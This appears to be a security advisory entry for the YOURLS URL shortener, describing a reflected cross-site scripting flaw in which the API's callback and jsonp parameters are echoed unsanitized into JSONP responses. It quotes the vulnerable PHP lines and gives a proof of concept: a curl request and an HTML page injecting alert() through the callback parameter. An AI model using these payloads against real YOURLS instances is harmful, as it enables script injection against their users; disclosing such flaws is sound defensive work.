+ "details": "### Summary\n\nThe callback and **jsonp** request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When **YOURLS_PRIVATE** is set to **false** (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.\n\n### Details\n\nVulnerability exists in the JSONP callback handling chain:\n\n```\nyourls-api.php:127-128\n\nif( isset( $_REQUEST['callback'] ) )\n $return['callback'] = $_REQUEST['callback'];\nelseif ( isset( $_REQUEST['jsonp'] ) )\n $return['callback'] = $_REQUEST['jsonp']; \n```\n---\n\n```\nincludes/functions-api.php:127-128\n\n$callback = isset( $output['callback'] ) ? $output['callback'] : '';\n$result = $callback . '(' . json_encode( $output ) . ')';\n```\n\n### PoC\n\nI. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.\n\nII. `curl \"http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert(document.domain)//\"\n`\n**Expected response:** `alert(document.domain)//({\"version\":\"1.10.2\",\"callback\":\"alert(document.domain)\\/\\/\"})`\n\nBrowser PoC file:\n\n```\n<!DOCTYPE html>\n<html>\n<head><title>pwn</title></head>\n<body>\n<h1>pwn</h1>\n<script src=\"http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert('pwn');//\"></script>\n</body>\n</html>\n```\n\n### Impact\n\nPublic Mode (YOURLS_PRIVATE=false): Full exploitation, any unauthenticated user can trigger **XSS.**\nPrivate Mode (YOURLS_PRIVATE=true): XSS payload is injected into 403 response body but browser blocks script execution. However, authenticated users or admins accessing malicious links are still vulnerable.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments